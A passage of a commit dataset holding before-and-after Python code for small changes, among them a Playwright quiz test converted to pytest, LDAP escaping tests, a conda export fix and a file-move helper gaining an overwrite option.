) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
|
39309bb0b8fe088b6576cfbf4d744f58ca6b1b0b | tests/test_quiz1.py | tests/test_quiz1.py | from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright) | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| Convert sample test to pytest | Convert sample test to pytest
| Python | agpl-3.0 | PyAr/PyZombis,PyAr/PyZombis,PyAr/PyZombis | from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)Convert sample test to pytest | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| <commit_before>from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)<commit_msg>Convert sample test to pytest<commit_after> | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)Convert sample test to pytestdef test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| <commit_before>from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)<commit_msg>Convert sample test to pytest<commit_after>def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
|
254ecc95cdd0c2809328634e50882ea42fb32105 | tests/test_utils.py | tests/test_utils.py | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
| import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | Add simple call test for set_connect_async | Add simple call test for set_connect_async
| Python | mit | Noirello/PyLDAP,Noirello/bonsai,Noirello/PyLDAP,Noirello/PyLDAP,Noirello/bonsai,Noirello/bonsai | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
Add simple call test for set_connect_async | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | <commit_before>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
<commit_msg>Add simple call test for set_connect_async<commit_after> | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
Add simple call test for set_connect_asyncimport pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | <commit_before>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
<commit_msg>Add simple call test for set_connect_async<commit_after>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None |
bff2488c184e142bfbf31e945b593e18db707dcc | conda_env/cli/main_export.py | conda_env/cli/main_export.py | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| Fix to use pip style == | Fix to use pip style ==
| Python | bsd-3-clause | isaac-kit/conda-env,conda/conda-env,nicoddemus/conda-env,isaac-kit/conda-env,phobson/conda-env,phobson/conda-env,mikecroucher/conda-env,asmeurer/conda-env,dan-blanchard/conda-env,conda/conda-env,ESSS/conda-env,dan-blanchard/conda-env,nicoddemus/conda-env,ESSS/conda-env,mikecroucher/conda-env,asmeurer/conda-env | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
Fix to use pip style == | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| <commit_before>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
<commit_msg>Fix to use pip style ==<commit_after> | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
Fix to use pip style ==from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| <commit_before>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
<commit_msg>Fix to use pip style ==<commit_after>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
|
5503a615db51a6ae0461cc0417c61ba508a43eae | ufyr/storage/utils.py | ufyr/storage/utils.py | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | Add in overwrite output file | Add in overwrite output file
| Python | unlicense | timeartist/ufyr | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))Add in overwrite output file | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | <commit_before>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))<commit_msg>Add in overwrite output file<commit_after> | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
